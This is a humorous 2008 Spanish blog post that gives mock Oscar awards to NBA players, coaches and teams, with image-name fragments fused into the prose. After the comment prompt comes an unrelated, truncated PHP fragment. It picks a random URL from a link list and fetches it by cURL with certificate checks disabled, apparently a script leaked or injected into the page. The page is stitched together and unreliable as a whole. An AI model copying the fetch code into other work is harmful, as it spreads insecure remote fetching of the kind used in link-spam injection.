Los Oscar de la NBA 2008

26 de February de 2008 por MagicJohnson32

Después de preguntaros en las últimas crónicas quiénes han sido para vosotros el mejor actor principal y secundario del primer tramo de la temporada, completamos nuestra semana de los Oscar con la lista completa de galardonados. Imitando la estructura de la gala, empezamos con los premios menores y acabamos con el de mejor película.

Mejor vestuario: Dwight Howard por Superman

La imagen del año. Da igual que el mate no fuese perfecto, el espectáculo de Dwight Howard, su estampa disfrazado de Superman, elevado a más de dos metros del suelo, casi flotando, tiene un poder icónico que garantiza su perdurabilidad en nuestra memoria.

Mejores efectos especiales: Gerald Green por Blowing Wild

No resultó tan impactante y carismático como Dwight Howard, pero el mate de Gerald Green soplando y apagando una vela merece un galardón por su originalidad, cada vez más importante en el concurso.

curryonceMejor canción: Eddy Curry por Once

El título de la película ganadora de la estatuilla a la mejor canción parece hacer referencia a los partidos de lo que va de temporada en los que Curry ha sumado más asistencias que pérdidas de balón. Una vez. Una sola vez.

En toda la temporada, Curry acumula 28 asistencias, 23 tapones, 13 robos… y 116 pérdidas de balón; es decir, que las pérdidas son casi el doble que la suma de asistencias, tapones y robos.

¿Canta o no canta Curry cuando dice que no piensa cambiar su forma de jugar?

kobeandpaumitchMejor guión original: Mitch Kupchak por The Good Thief

Argumento: Mitch y Kevin juegan una partida de poker. Mitch tiene la noche de su vida. Kevin tiene que recurrir a los ahorros para la Universidad del niño. En el clímax, Kevin ve la oportunidad de recuperar todas sus pérdidas gracias a una buena mano. El plano final, de un gran dramatismo, nos muestra a Kevin pronunciando las palabras que cierran la película: ¡¡¡Apuesto a Pau Gasol!!!

The End.

Mejor guión adaptado: Darrell Armstrong, Dikembe Mutombo y Dale Davis por No Country For Old Menmutomboldmen

Cerca de cumplir los 39 años, Dale Davis está a punto de concretar su retorno a la NBA, concretamente a los Pistons, con los que ya disputó las pasadas dos temporadas. Aun así, no sería el más veterano en activo. Le superarían el gran Astronauta, que cumplirá los 40 en junio, y Dikembe Mutombo, que hará los 42 este verano.

¿Quién dijo que la NBA no es país para viejos?

yilostMejor película de habla no inglesa: Terry Porter y Yi Jianlian por Lost In Traslation

48 partidos como titular. Tuvo que lesionarse Yi Jianlian para que Terry Porter se atreviese a sentarlo, y no será porque los Bucks estén haciendo una gran temporada. Villanueva, sustituto de Yi, supera con creces sus números en los encuentros que ha disputado partiendo en el quinteto inicial. Hay ciertas cosas que no se entienden, y no me refiero al chino.westernlogo

Mejor película: Spurs, Lakers, Suns, Mavs, Hornets, Jazz y Rockets por Wild Wild West

Mientras Nuggets y Warriors se pegan por la plaza de Playoffs más cara que se recuerda, estos otros siete equipos están inmersos en una lucha feroz por la ventaja de campo y prometen una postseason memorable.

¿Una primera ronda con Spurs-Rockets y Suns-Mavs? ¡Bienvenidos al Salvaje Oeste!

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>